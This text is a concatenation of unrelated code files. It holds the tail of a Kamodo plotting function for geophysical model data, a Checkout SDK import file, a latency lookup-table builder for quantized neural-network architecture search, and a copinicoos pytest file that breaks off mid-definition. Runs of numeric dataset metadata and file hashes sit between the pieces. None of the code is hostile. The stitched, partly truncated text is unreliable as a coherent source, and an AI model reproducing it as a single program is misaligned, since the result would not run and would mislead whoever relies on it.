                    data = grid4D(kamodo_object, varname, time, lon, lat, height)
                    return reshape(data,(time.shape[0],height.shape[0]))
                plot_kamodo['TimeH'] = pfunc
                return plot_kamodo.plot(TimeH=dict(time=t,height=h))
            elif vert=='radius':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lon=lon,lat=lat)
                def pfunc(time, lon, lat, radius):
                    data = grid4D(kamodo_object, varname, time, lon, lat, radius)
                    return reshape(data,(time.shape[0],radius.shape[0]))
                plot_kamodo['TimeH'] = pfunc
                return plot_kamodo.plot(TimeH=dict(time=t,radius=h))
            elif vert=='ilev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lon=lon,lat=lat)
                def pfunc(time, lon, lat, ilev):
                    data = grid4D(kamodo_object, varname, time, lon, lat, ilev)
                    return reshape(data,(time.shape[0],ilev.shape[0]))
                plot_kamodo['TimeH'] = pfunc
                return plot_kamodo.plot(TimeH=dict(time=t,ilev=h))
            elif vert=='ilev1':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lon=lon,lat=lat)
                def pfunc(time, lon, lat, ilev1):
                    data = grid4D(kamodo_object, varname, time, lon, lat, ilev1)
                    return reshape(data,(time.shape[0],ilev1.shape[0]))
                plot_kamodo['TimeH'] = pfunc
                return plot_kamodo.plot(TimeH=dict(time=t,ilev1=h))
            elif vert=='milev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(mlon=lon,mlat=lat)
                def pfunc(time, mlon, mlat, milev):
                    data = grid4D(kamodo_object, varname, time, mlon, mlat, milev)
                    return reshape(data,(time.shape[0],milev.shape[0]))
                plot_kamodo['TimeH'] = pfunc
                return plot_kamodo.plot(TimeH=dict(time=t,milev=h))
            elif vert=='none':
                raise AttributeError('Variable does not depend on height.')
        #LonH plots
        elif plottype=='LonH':
            #accounting for differing vertical dependencies
            arg_units = {coord_list[1]:xvec[coord_list[1]],
                         coord_list[-1]:xvec[coord_list[-1]]} #'lon':'deg', 'height':'km'
            if vert=='height':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,lat=lat)
                def pfunc(time, lon, lat, height):
                    data = grid4D(kamodo_object, varname, time, lon, lat, height)
                    return reshape(data,(lon.shape[0],height.shape[0]))
                plot_kamodo['LonH'] = pfunc
                return plot_kamodo.plot(LonH=dict(lon=lon,height=h))
            elif vert=='radius':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,lat=lat)
                def pfunc(time, lon, lat, radius):
                    data = grid4D(kamodo_object, varname, time, lon, lat, radius)
                    return reshape(data,(lon.shape[0],radius.shape[0]))
                plot_kamodo['LonH'] = pfunc
                return plot_kamodo.plot(LonH=dict(lon=lon,radius=h))
            elif vert=='ilev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,lat=lat)
                def pfunc(time, lon, lat, ilev):
                    data = grid4D(kamodo_object, varname, time, lon, lat, ilev)
                    return reshape(data,(lon.shape[0],ilev.shape[0]))
                plot_kamodo['LonH'] = pfunc
                return plot_kamodo.plot(LonH=dict(lon=lon,ilev=h))
            elif vert=='ilev1':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,lat=lat)
                def pfunc(time, lon, lat, ilev1):
                    data = grid4D(kamodo_object, varname, time, lon, lat, ilev1)
                    return reshape(data,(lon.shape[0],ilev1.shape[0]))
                plot_kamodo['LonH'] = pfunc
                return plot_kamodo.plot(LonH=dict(lon=lon,ilev1=h))
            elif vert=='milev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,mlat=lat)
                def pfunc(time, mlon, mlat, milev):
                    data = grid4D(kamodo_object, varname, time, mlon, mlat, milev)
                    return reshape(data,(mlon.shape[0],milev.shape[0]))
                plot_kamodo['LonH'] = pfunc
                return plot_kamodo.plot(LonH=dict(mlon=lon,milev=h))
            elif vert=='none':
                raise AttributeError('Variable does not depend on height.')
        #LatH plots
        elif plottype=='LatH':
            #accounting for differing vertical dependencies
            arg_units = {coord_list[2]:xvec[coord_list[2]],
                         coord_list[-1]:xvec[coord_list[-1]]} #'lat':'deg', 'height':'km'
            if vert=='height':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,lon=lon)
                def pfunc(time, lon, lat, height):
                    data = grid4D(kamodo_object, varname, time, lon, lat, height)
                    return reshape(data,(lat.shape[0],height.shape[0]))
                plot_kamodo['LatH'] = pfunc
                return plot_kamodo.plot(LatH=dict(lat=lat,height=h))
            elif vert=='radius':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,lon=lon)
                def pfunc(time, lon, lat, radius):
                    data = grid4D(kamodo_object, varname, time, lon, lat, radius)
                    return reshape(data,(lat.shape[0],radius.shape[0]))
                plot_kamodo['LatH'] = pfunc
                return plot_kamodo.plot(LatH=dict(lat=lat,radius=h))
            elif vert=='ilev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,lon=lon)
                def pfunc(time, lon, lat, ilev):
                    data = grid4D(kamodo_object, varname, time, lon, lat, ilev)
                    return reshape(data,(lat.shape[0],ilev.shape[0]))
                plot_kamodo['LatH'] = pfunc
                return plot_kamodo.plot(LatH=dict(lat=lat,ilev=h))
            elif vert=='ilev1':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,lon=lon)
                def pfunc(time, lon, lat, ilev1):
                    data = grid4D(kamodo_object, varname, time, lon, lat, ilev1)
                    return reshape(data,(lat.shape[0],ilev1.shape[0]))
                plot_kamodo['LatH'] = pfunc
                return plot_kamodo.plot(LatH=dict(lat=lat,ilev1=h))
            elif vert=='milev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,mlon=lon)
                def pfunc(time, mlon, mlat, milev):
                    data = grid4D(kamodo_object, varname, time, mlon, mlat, milev)
                    return reshape(data,(mlat.shape[0],milev.shape[0]))
                plot_kamodo['LatH'] = pfunc
                return plot_kamodo.plot(LatH=dict(mlat=lat,milev=h))
            elif vert=='none':
                raise AttributeError('Variable does not depend on height.')
        #cartesian plots
        elif plottype=='TimeX':
            arg_units={'time':'hr',coord_list[1]:xvec[coord_list[1]]} #'X':'R_E'
            @kamodofy(units=units, arg_units=arg_units)
            @partial(y=lat,z=h)
            def pfunc(time, x, y, z):
                data = grid4D(kamodo_object, varname, time, x, y, z)
                return reshape(data,(x.shape[0],time.shape[0])).T
            plot_kamodo['TimeX'] = pfunc
            return plot_kamodo.plot(TimeX=dict(time=t,x=lon))
        elif plottype=='TimeY':
            arg_units={'time':'hr',coord_list[2]:xvec[coord_list[2]]} #'X':'R_E'
            @kamodofy(units=units, arg_units=arg_units)
            @partial(x=lon,z=h)
            def pfunc(time, x, y, z):
                data = grid4D(kamodo_object, varname, time, x, y, z)
                return reshape(data,(time.shape[0],y.shape[0]))
            plot_kamodo['TimeY'] = pfunc
            return plot_kamodo.plot(TimeY=dict(time=t,y=lat))
        elif plottype=='TimeZ':
            arg_units={'time':'hr',coord_list[3]:xvec[coord_list[3]]} #'X':'R_E'
            @kamodofy(units=units, arg_units=arg_units)
            @partial(x=lon,y=lat)
            def pfunc(time, x, y, z):
                data = grid4D(kamodo_object, varname, time, x, y, z)
                return reshape(data,(time.shape[0],z.shape[0]))
            plot_kamodo['TimeZ'] = pfunc
            return plot_kamodo.plot(TimeZ=dict(time=t,z=h))
        elif plottype=='XY':
            arg_units = {coord_list[1]:xvec[coord_list[1]],
                         coord_list[2]:xvec[coord_list[2]]} #e.g. {'x':'R_E','y':'R_E'}
            @kamodofy(units=units, arg_units=arg_units)
            @partial(time=t,z=h)
            def pfunc(time, x, y, z):
                data = grid4D(kamodo_object, varname, time, x, y, z)
                return reshape(data,(x.shape[0],y.shape[0]))
            plot_kamodo['XY'] = pfunc
            return plot_kamodo.plot(XY=dict(x=lon,y=lat))
        elif plottype=='XZ':
            arg_units = {coord_list[1]:xvec[coord_list[1]],
                         coord_list[3]:xvec[coord_list[3]]} #e.g. {'x':'R_E','z':'R_E'}
            @kamodofy(units=units, arg_units=arg_units)
            @partial(time=t,y=lat)
            def pfunc(time, x, y, z):
                data = grid4D(kamodo_object, varname, time, x, y, z)
                return reshape(data,(x.shape[0],z.shape[0]))
            plot_kamodo['XZ'] = pfunc
            return plot_kamodo.plot(XZ=dict(x=lon,z=h))
        elif plottype=='YZ':
            arg_units = {coord_list[2]:xvec[coord_list[2]],
                         coord_list[3]:xvec[coord_list[3]]} #e.g. {'y':'R_E','z':'R_E'}
            @kamodofy(units=units, arg_units=arg_units)
            @partial(time=t,x=lon)
            def pfunc(time, x, y, z):
                data = grid4D(kamodo_object, varname, time, x, y, z)
                return reshape(data,(y.shape[0],z.shape[0]))
            plot_kamodo['YZ'] = pfunc
            return plot_kamodo.plot(YZ=dict(y=lat,z=h))
| 54.92142
| 112
| 0.521219
| 5,163
| 43,333
| 4.270579
| 0.04203
| 0.069663
| 0.099052
| 0.089709
| 0.900404
| 0.894009
| 0.890834
| 0.880448
| 0.872194
| 0.871468
| 0
| 0.012012
| 0.352549
| 43,333
| 788
| 113
| 54.991117
| 0.773881
| 0.067777
| 0
| 0.889362
| 0
| 0
| 0.037934
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.124823
| false
| 0
| 0.002837
| 0.059574
| 0.337589
| 0.001418
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aa59e1ac4e63002096e03bd412ca6f11c732b9a9
| 191
|
py
|
Python
|
checkout_sdk/vaults/__init__.py
|
checkout/checkout-sdk-python
|
908d25c2904508fb0130e186d7d5de2ad116f0c3
|
[
"MIT"
] | 13
|
2018-08-29T09:09:11.000Z
|
2021-11-26T08:30:58.000Z
|
checkout_sdk/vaults/__init__.py
|
checkout/checkout-sdk-python
|
908d25c2904508fb0130e186d7d5de2ad116f0c3
|
[
"MIT"
] | 17
|
2018-08-30T07:39:15.000Z
|
2022-03-31T16:09:38.000Z
|
checkout_sdk/vaults/__init__.py
|
checkout/checkout-sdk-python
|
908d25c2904508fb0130e186d7d5de2ad116f0c3
|
[
"MIT"
] | 13
|
2018-09-11T13:00:55.000Z
|
2021-05-19T15:19:30.000Z
|
from checkout_sdk.vaults.exchange_client import ExchangeClient
from checkout_sdk.vaults.tokens_client import TokensClient
from checkout_sdk.vaults.instruments_client import InstrumentsClient
| 47.75
| 68
| 0.905759
| 24
| 191
| 6.958333
| 0.5
| 0.215569
| 0.269461
| 0.377246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.062827
| 191
| 3
| 69
| 63.666667
| 0.932961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
aa60cb6ec06dcc6ed5892a2a01d4c8b1243c3f7e
| 18,678
|
py
|
Python
|
quantization/cifar10/supernet_functions/lookup_table_builder.py
|
sunghern/Auto-Compression
|
7c1123e5ffb63b0c34bef2db40dbfb560cb25c2e
|
[
"MIT"
] | 11
|
2019-11-26T04:33:31.000Z
|
2022-03-28T11:35:54.000Z
|
quantization/cifar10/supernet_functions/lookup_table_builder.py
|
sunghern/Auto-Compression
|
7c1123e5ffb63b0c34bef2db40dbfb560cb25c2e
|
[
"MIT"
] | 22
|
2019-11-26T06:48:07.000Z
|
2021-12-20T12:50:16.000Z
|
quantization/cifar10/supernet_functions/lookup_table_builder.py
|
sunghern/Auto-Compression
|
7c1123e5ffb63b0c34bef2db40dbfb560cb25c2e
|
[
"MIT"
] | 10
|
2019-11-26T04:33:57.000Z
|
2021-10-12T04:30:48.000Z
|
import timeit
import torch
from collections import OrderedDict
import gc
from fbnet_building_blocks.fbnet_builder import PRIMITIVES
from general_functions.utils import add_text_to_file, clear_files_in_the_list
from supernet_functions.config_for_supernet import CONFIG_SUPERNET
import numpy as np
import sys
import math
import copy
np.set_printoptions(threshold=sys.maxsize)
# the settings from the page 4 of https://arxiv.org/pdf/1812.03443.pdf
#### table 2
#CANDIDATE_BLOCKS = ["ir_k3_e1", "ir_k3_s2", "ir_k3_e3",
# "ir_k3_e6", "ir_k5_e1", "ir_k5_s2",
# "ir_k5_e3", "ir_k5_e6", "skip"]
# High-precision quantization candidates: "A<n>_W<m>" = n activation bits,
# m weight bits (consumed by LookUpTable_HIGH).
CANDIDATE_HIGH = ["A2_W1", "A3_W1", "A4_W1",
                  "A2_W2", "A3_W2", "A4_W2"]
# Quantized block variants consumed by LookUpTable.
CANDIDATE_BLOCKS = ["quant_a1_w1", "quant_a2_w2", "quant_a3_w3"]
# Per-layer architecture description of the searched supernet; each value
# list has one entry per searched layer (7 layers here).
SEARCH_SPACE = OrderedDict([
    #### table 1. input shapes of the searched layers (considering strides)
    # Note: the second and third dimensions are recommended (will not be used in training) and written just for debugging
    ("input_shape", [(3, 32, 32),
                     (128, 32, 32), (128, 16, 16), (256, 16, 16), (256, 8, 8),
                     (512, 8, 8), (512, 4, 4)]),
    # table 1. filter (output channel) counts over the layers
    ("channel_size", [128,
                      128, 256, 256, 512, 512, 1024]),
    # table 1. strides over the layers
    ("strides", [1,
                 1, 1, 1, 1, 1,
                 1]),
    # per-layer convolution padding
    ("padding", [1, 1, 1, 1, 1, 1, 0]),
    # 1 where the layer is followed by a max-pool
    ("Maxpool", [0, 1, 0, 1, 0, 1, 1]),
    # per-layer activation bit-width
    ("Activation", [3, 3, 3, 3, 3, 3, 3]),
    # per-layer average weight bit budget (see LookUpTable._generate_index)
    ("Weight", [7, 4, 3, 4, 3, 3, 3])
])
class LookUpTable_HIGH:
    """Per-layer latency lookup table for the high-precision candidate ops.

    Latencies are either measured by timing each candidate op on random
    input (``calulate_latency=True``) or parsed back from a previously
    written lookup-table file.
    """

    def __init__(self, candidate_blocks=CANDIDATE_HIGH, search_space=SEARCH_SPACE,
                 calulate_latency=False):
        # Number of searched layers is driven by the input-shape list.
        self.cnt_layers = len(search_space["input_shape"])
        # FIX: the original stored the module-level globals here, silently
        # ignoring the constructor arguments; honour the arguments instead.
        self.search_space = search_space
        self.candidate = candidate_blocks
        # Constructor (callable) for each candidate operation.
        self.lookup_table_operations = {op_name: PRIMITIVES[op_name] for op_name in candidate_blocks}
        # One argument tuple per candidate per layer; input shapes are kept
        # separately for building random latency-probe inputs.
        self.layers_parameters, self.layers_input_shapes = self._generate_layers_parameters(search_space)
        self.lookup_table_latency = None
        if calulate_latency:
            self._create_from_operations(cnt_of_runs=CONFIG_SUPERNET['lookup_table']['number_of_runs'],
                                         write_to_file=CONFIG_SUPERNET['lookup_table']['path_to_lookup_table_high'])
        else:
            self._create_from_file(path_to_file=CONFIG_SUPERNET['lookup_table']['path_to_lookup_table_high'])

    def _generate_layers_parameters(self, search_space):
        """Build the op-constructor argument tuples for every layer.

        Returns ``(layers_parameters, layers_input_shapes)`` where
        ``layers_parameters[layer]`` is a tuple of six identical argument
        tuples (one per CANDIDATE_HIGH entry):
        (C_in, C_out, activation_bits, weight_bits, stride, padding,
        maxpool_flag, None).
        """
        def _args(layer_id):
            # Single candidate argument tuple for this layer.
            return (search_space["input_shape"][layer_id][0],
                    search_space["channel_size"][layer_id],
                    search_space["Activation"][layer_id],
                    search_space["Weight"][layer_id],
                    search_space["strides"][layer_id],
                    search_space["padding"][layer_id],
                    search_space["Maxpool"][layer_id],
                    None)

        # The original spelled the same 8-tuple out six times per layer;
        # generate it instead (equal values, same structure).
        layers_parameters = [tuple(_args(layer_id) for _ in range(6))
                             for layer_id in range(self.cnt_layers)]
        # layers_input_shapes are (C_in, input_w, input_h) per layer.
        layers_input_shapes = search_space["input_shape"]
        return layers_parameters, layers_input_shapes

    # CNT_OP_RUNS is the number of timing repetitions (we take the average).
    def _create_from_operations(self, cnt_of_runs, write_to_file=None):
        """Measure latencies and optionally persist them to a file."""
        self.lookup_table_latency = self._calculate_latency(self.lookup_table_operations,
                                                            self.layers_parameters,
                                                            self.layers_input_shapes,
                                                            cnt_of_runs)
        if write_to_file is not None:
            self._write_lookup_table_to_file(write_to_file)

    def _calculate_latency(self, operations, layers_parameters, layers_input_shapes, cnt_of_runs):
        """Time each op on random input; return [{op_name: microseconds}] per layer."""
        LATENCY_BATCH_SIZE = 1
        latency_table_layer_by_ops = [{} for _ in range(self.cnt_layers)]
        for layer_id in range(self.cnt_layers):
            for op_name in operations:
                op = operations[op_name](*layers_parameters[layer_id])
                input_sample = torch.randn((LATENCY_BATCH_SIZE, *layers_input_shapes[layer_id]))
                # timeit evaluates its statement in globals(), so the op and
                # its input must be published there.
                globals()['op'], globals()['input_sample'] = op, input_sample
                total_time = timeit.timeit('output = op(input_sample)', setup="gc.enable()",
                                           globals=globals(), number=cnt_of_runs)
                # measured in micro-seconds
                latency_table_layer_by_ops[layer_id][op_name] = total_time / cnt_of_runs / LATENCY_BATCH_SIZE * 1e6
        return latency_table_layer_by_ops

    def _write_lookup_table_to_file(self, path_to_file):
        """Write a header of op names, then one space-separated latency row per layer."""
        clear_files_in_the_list([path_to_file])
        ops = [op_name for op_name in self.lookup_table_operations]
        text = [op_name + " " for op_name in ops[:-1]]
        text.append(ops[-1] + "\n")
        for layer_id in range(self.cnt_layers):
            for op_name in ops:
                text.append(str(self.lookup_table_latency[layer_id][op_name]))
                text.append(" ")
            text[-1] = "\n"
        text = text[:-1]
        text = ''.join(text)
        add_text_to_file(text, path_to_file)

    def _create_from_file(self, path_to_file):
        """Populate the latency table from a previously written file."""
        self.lookup_table_latency = self._read_lookup_table_from_file(path_to_file)

    def _read_lookup_table_from_file(self, path_to_file):
        """Parse the file produced by _write_lookup_table_to_file."""
        # FIX: close the file deterministically (the original leaked the handle).
        with open(path_to_file) as f:
            latences = [line.strip('\n') for line in f]
        ops_names = latences[0].split(" ")
        latences = [list(map(float, layer.split(" "))) for layer in latences[1:]]
        lookup_table_latency = [{op_name: latences[i][op_id]
                                 for op_id, op_name in enumerate(ops_names)
                                 } for i in range(self.cnt_layers)]
        return lookup_table_latency
# **** to recalculate latency use command:
# l_table = LookUpTable(calulate_latency=True, path_to_file='lookup_table.txt', cnt_of_runs=50)
# results will be written to './supernet_functions/lookup_table.txt''
# **** to read latency from the another file use command:
# l_table = LookUpTable(calulate_latency=False, path_to_file='lookup_table.txt')
class LookUpTable:
    # Latency lookup table for the quantized candidates (CANDIDATE_BLOCKS).
    # Unlike LookUpTable_HIGH it also derives, per candidate, a per-output-
    # channel bit allocation ("index") from a saved checkpoint and folds that
    # allocation into the latencies read from file.
    def __init__(self, candidate_blocks=CANDIDATE_BLOCKS, search_space=SEARCH_SPACE,
                 calulate_latency=False, count=0, act_update=[], weight_update=[]):
        # NOTE(review): act_update/weight_update are mutable default args and
        # are currently unused — the code that applied them is commented out
        # below. `count` selects which checkpoint _generate_index loads.
        self.cnt_layers = len(search_space["input_shape"])
        '''
        global SEARCH_SPACE
        SEARCH_SPACE["Activation"] = act_update
        for i in range(len(search_space["Weight"])):
            SEARCH_SPACE["Weight"][i] += weight_update[i]
        print(SEARCH_SPACE["Activation"])
        print(SEARCH_SPACE["Weight"])
        '''
        # constructors for each operation
        self.lookup_table_operations = {op_name : PRIMITIVES[op_name] for op_name in candidate_blocks}
        # arguments for the ops constructors. one set of arguments for all constructors at each layer
        # input_shapes just for convenience
        self.count = count
        self.index = []
        # One bit-allocation index per candidate op (3 candidates). Note the
        # allocation is randomized (noise below), so the three differ slightly.
        for i in range(3):
            self.index.append(self._generate_index(search_space["Weight"]))
        self.layers_parameters, self.layers_input_shapes = self._generate_layers_parameters(search_space)
        # lookup_table
        self.lookup_table_latency = None
        if calulate_latency:
            self._create_from_operations(cnt_of_runs=CONFIG_SUPERNET['lookup_table']['number_of_runs'],
                                         write_to_file=CONFIG_SUPERNET['lookup_table']['path_to_lookup_table'])
        else:
            self._create_from_file(path_to_file=CONFIG_SUPERNET['lookup_table']['path_to_lookup_table'])
    def _generate_layers_parameters(self, search_space):
        # Per layer, build one argument tuple per candidate op; the three
        # tuples differ only in the final element (the candidate's bit
        # allocation index). Tuple layout:
        # (C_in, C_out, activation_bits, weight_bits, stride, padding,
        #  maxpool_flag, index).
        layers_parameters = [((search_space["input_shape"][layer_id][0],
                               search_space["channel_size"][layer_id],
                               search_space["Activation"][layer_id],
                               search_space["Weight"][layer_id],
                               search_space["strides"][layer_id],
                               search_space["padding"][layer_id],
                               search_space["Maxpool"][layer_id],
                               self.index[0]),
                              (search_space["input_shape"][layer_id][0],
                               search_space["channel_size"][layer_id],
                               search_space["Activation"][layer_id],
                               search_space["Weight"][layer_id],
                               search_space["strides"][layer_id],
                               search_space["padding"][layer_id],
                               search_space["Maxpool"][layer_id],
                               self.index[1]),
                              (search_space["input_shape"][layer_id][0],
                               search_space["channel_size"][layer_id],
                               search_space["Activation"][layer_id],
                               search_space["Weight"][layer_id],
                               search_space["strides"][layer_id],
                               search_space["padding"][layer_id],
                               search_space["Maxpool"][layer_id],
                               self.index[2]),
                              ) for layer_id in range(self.cnt_layers)]
        # layers_input_shapes are (C_in, input_w, input_h)
        layers_input_shapes = search_space["input_shape"]
        return layers_parameters, layers_input_shapes
    def _generate_index(self, bit):
        # Greedy per-channel bit allocation: channels with the largest
        # (max - min)^2 value spread receive extra bits until the layer's
        # budget (bit[layer] * n_channels) is spent. Returns, per layer,
        # eight lists — index[layer][b] holds the channel ids assigned
        # b+1 bits. NOTE(review): relies on hard-coded checkpoint paths and
        # np.random noise, so results are machine- and run-dependent.
        if self.count==0:
            # First call: allocate from the pretrained supernet checkpoint.
            m = torch.load('/home/khs/data/sup_logs/cifar10/best-260.pth')
            count = 0
            index = []
            for i in m.keys():
                if 'weight' in i:
                    if count ==7:
                        # only the first 7 weight tensors (one per layer)
                        break
                    index.append([])
                    w = m[i]
                    w_numpy = w.cpu().numpy()
                    # flatten to (out_channels, everything_else)
                    w_numpy = w_numpy.reshape(w_numpy.shape[0], -1)
                    budget = bit[count] * w_numpy.shape[0]
                    max_val = np.max(w_numpy, axis=1)
                    min_val = np.min(w_numpy, axis=1)
                    # small noise breaks ties between equal-spread channels
                    noise = np.random.normal(0, 0.01, w_numpy.shape[0])
                    inter = (max_val - min_val)**2
                    inter = inter + noise
                    b = np.ones(w_numpy.shape[0])
                    I = inter / (3**b)
                    while np.sum(b) < budget:
                        # give one more bit to the channel with largest gain
                        idx = I.argmax()
                        b[idx] += 1
                        I = inter / (3**b)
                    # NOTE(review): this inner `i` shadows the dict-key loop
                    # variable; harmless for iteration, but fragile.
                    for i in range(8):
                        index[count].append(list(np.where(b==i+1)[0]))
                    count+=1
        else:
            # Later calls: allocate from the best searched model, using the
            # argmax of each layer's thetas to pick the chosen op's weights.
            m = torch.load('/home/khs/data/sup_logs/cifar10/best_model.pth')
            index = []
            count = 0
            tmp = []
            for i in m.keys():
                if 'thetas' in i and str(count) in i:
                    tmp.append(np.argmax(m[i].cpu().numpy()))
                    count+=1
            count = 0
            for i in m.keys():
                if count == 7:
                    break
                if str(count) + '.ops.' + str(tmp[count]) in i and 'weight' in i:
                    index.append([])
                    w = m[i]
                    w_numpy = w.cpu().numpy()
                    w_numpy = w_numpy.reshape(w_numpy.shape[0], -1)
                    budget = bit[count] * w_numpy.shape[0]
                    max_val = np.max(w_numpy, axis=1)
                    min_val = np.min(w_numpy, axis=1)
                    # noise amplitude decays with successive calls
                    sigma = 0.01 * ((0.5)**self.count)
                    noise = np.random.normal(0, sigma, w_numpy.shape[0])
                    inter = (max_val - min_val)**2
                    inter = inter + noise
                    b = np.ones(w_numpy.shape[0])
                    I = inter / (3**b)
                    while np.sum(b) < budget:
                        idx = I.argmax()
                        b[idx] += 1
                        I = inter / (3**b)
                    for i in range(8):
                        index[count].append(list(np.where(b==i+1)[0]))
                    count+=1
        return index
    # CNT_OP_RUNS is the number of timing repetitions (we take the average)
    def _create_from_operations(self, cnt_of_runs, write_to_file=None):
        # Measure latencies, then optionally persist them.
        self.lookup_table_latency = self._calculate_latency(self.lookup_table_operations,
                                                            self.layers_parameters,
                                                            self.layers_input_shapes,
                                                            cnt_of_runs)
        if write_to_file is not None:
            self._write_lookup_table_to_file(write_to_file)
    def _calculate_latency(self, operations, layers_parameters, layers_input_shapes, cnt_of_runs):
        # Time each candidate op on random input of the layer's shape.
        LATENCY_BATCH_SIZE = 1
        latency_table_layer_by_ops = [{} for i in range(self.cnt_layers)]
        for layer_id in range(self.cnt_layers):
            for op_name in operations:
                op = operations[op_name](*layers_parameters[layer_id])
                input_sample = torch.randn((LATENCY_BATCH_SIZE, *layers_input_shapes[layer_id]))
                # timeit runs in globals(), so expose op/input there
                globals()['op'], globals()['input_sample'] = op, input_sample
                total_time = timeit.timeit('output = op(input_sample)', setup="gc.enable()", \
                                           globals=globals(), number=cnt_of_runs)
                # measured in micro-second
                latency_table_layer_by_ops[layer_id][op_name] = total_time / cnt_of_runs / LATENCY_BATCH_SIZE * 1e6
        return latency_table_layer_by_ops
    def _write_lookup_table_to_file(self, path_to_file):
        # Header of op names, then one space-separated latency row per layer.
        clear_files_in_the_list([path_to_file])
        ops = [op_name for op_name in self.lookup_table_operations]
        text = [op_name + " " for op_name in ops[:-1]]
        text.append(ops[-1] + "\n")
        for layer_id in range(self.cnt_layers):
            for op_name in ops:
                text.append(str(self.lookup_table_latency[layer_id][op_name]))
                text.append(" ")
            text[-1] = "\n"
        text = text[:-1]
        text = ''.join(text)
        add_text_to_file(text, path_to_file)
    def _create_from_file(self, path_to_file):
        # Populate the latency table from a previously written file.
        self.lookup_table_latency = self._read_lookup_table_from_file(path_to_file)
    def _read_lookup_table_from_file(self, path_to_file):
        # Combine per-bit latencies from file with this instance's channel
        # bit allocation: channels are padded up to multiples of 8 per bit
        # width before weighting by the file's latency entry.
        # NOTE(review): rows of the file are indexed by bit width here
        # (latences[bit][op]), not by layer as in LookUpTable_HIGH — confirm
        # the on-disk format matches.
        latences = [line.strip('\n') for line in open(path_to_file)]
        ops_names = latences[0].split(" ")
        latences = [list(map(float, layer.split(" "))) for layer in latences[1:]]
        latency = []
        for layer in range(self.cnt_layers):
            latency.append([])
            for op in range(3):
                latency[layer].append([])
        for op in range(3):
            for layer in range(self.cnt_layers):
                latency[layer][op] = 0
                for bit in range(8):
                    latency[layer][op] += math.ceil(len(self.index[op][layer][bit])/8)*8 * latences[bit][op]
        lookup_table_latency = [{op_name : latency[i][op_id]
                                 for op_id, op_name in enumerate(ops_names)
                                 } for i in range(self.cnt_layers)]
        return lookup_table_latency
| 50.893733
| 121
| 0.530571
| 2,155
| 18,678
| 4.27471
| 0.114617
| 0.101498
| 0.063504
| 0.087929
| 0.813287
| 0.803734
| 0.780395
| 0.759444
| 0.743812
| 0.743812
| 0
| 0.020911
| 0.365028
| 18,678
| 366
| 122
| 51.032787
| 0.755818
| 0.084966
| 0
| 0.766892
| 0
| 0
| 0.067732
| 0.008347
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050676
| false
| 0
| 0.037162
| 0
| 0.118243
| 0.003378
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aa68d1248496dc1025a7ba16e2ad201dc91ec0e5
| 7,563
|
py
|
Python
|
tests/test_input_manager.py
|
gitter-badger/copinicoos
|
6a758c3b1718c904ae066d5617291807798b7ab1
|
[
"MIT"
] | 2
|
2019-09-11T03:08:10.000Z
|
2019-09-13T08:02:45.000Z
|
tests/test_input_manager.py
|
gitter-badger/copinicoos
|
6a758c3b1718c904ae066d5617291807798b7ab1
|
[
"MIT"
] | 35
|
2019-08-04T03:37:12.000Z
|
2019-09-17T03:30:18.000Z
|
tests/test_input_manager.py
|
gitter-badger/copinicoos
|
6a758c3b1718c904ae066d5617291807798b7ab1
|
[
"MIT"
] | 2
|
2019-09-07T04:16:59.000Z
|
2020-09-23T10:51:37.000Z
|
import json
import os
import time
from pathlib import Path

import pytest

from copinicoos import InputManager
from copinicoos import input_manager
from conftest import query_txt_path, secrets1_json_path, secrets2_json_path, test_dir, close_all_loggers
@pytest.mark.parametrize(
    "query, login", [
        ("@" + query_txt_path, "@" + secrets1_json_path),
        ("@" + query_txt_path, secrets1_json_path),
        ("@" + query_txt_path, secrets2_json_path),
    ]
)
def test_cmd_input_fresh(query, login):
    """A fresh run parsed from CLI-style args should yield an Args object."""
    manager = InputManager()
    manager.cmd_input(test_args=['fresh', query, login])
    parsed = manager.return_args()
    assert type(parsed).__name__ == "Args"
def test_cmd_input_resume(worker_manager):
    """Resuming against an existing workdir should still yield an Args object."""
    worker_manager.setup_workdir()
    manager = InputManager()
    manager.cmd_input(test_args=['resume', '-d', test_dir])
    parsed = manager.return_args()
    assert type(parsed).__name__ == "Args"
def test_cmd_input_options(worker_manager):
    """Extra option flags on resume abort with SystemExit, so no Args is built."""
    worker_manager.setup_workdir()
    manager = InputManager()
    with pytest.raises(SystemExit):
        manager.cmd_input(test_args=['resume', '-d', test_dir, '-r', '20.7', '-p', '40.8'])
    parsed = manager.return_args()
    assert type(parsed).__name__ != "Args"
def test_get_total_results_from_query_success(query, input_manager_with_2_workers):
